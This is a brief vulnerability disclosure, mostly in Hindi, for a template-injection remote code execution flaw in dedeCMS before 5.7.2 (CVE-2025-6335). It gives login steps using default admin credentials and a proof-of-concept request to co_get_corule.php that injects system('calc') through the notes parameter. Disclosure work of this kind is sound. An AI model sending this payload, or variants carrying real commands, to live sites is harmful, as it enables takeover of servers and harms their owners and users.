शीर्षक: dedeCMS 5.7 sp2 में टेम्पलेट इंजेक्शन कमांड निष्पादन भेद्यता
BUG_Author: Ewoji
Affected Version: dedeCMS < 5.7.2
Vendor: Shanghai Zhuozhuo Network Technology Co., LTD
Software: dedeCMS
Vulnerability Files:
/include/dedetag.class.php
विवरण:
-
स्थापना के पश्चात, पृष्ठभूमि में लॉग इन करें
- डिफ़ॉल्ट खाता पासवर्ड admin/admin का उपयोग करें
-
टेम्पलेट का शोषण
- dede/co_get_corule.php इंटरफ़ेस तक पहुँचें
- पैरामीटर /dede/co_get_corule.php? notes={dede:"); system('calc'); ///}&job=1 पास करें, इस प्रकार दो बार एक्सेस करने से कमांड निष्पादित हो सकता है
-
शोषण का सत्यापन:
- यदि इंजेक्शन सफल होता है, तो हमलावर मनमाना कमांड निष्पादित करेगा
प्रमाण-अवधारणा:
/dede/co_get_corule.php?notes={dede:");system('calc');///}&job=1
इस प्रकार दो बार एक्सेस करने से कमांड निष्पादित किया जा सकता है
विवरण:CVE-2025-6335-dedeCMS पृष्ठभूमि टेम्पलेट इंजेक्शन RCE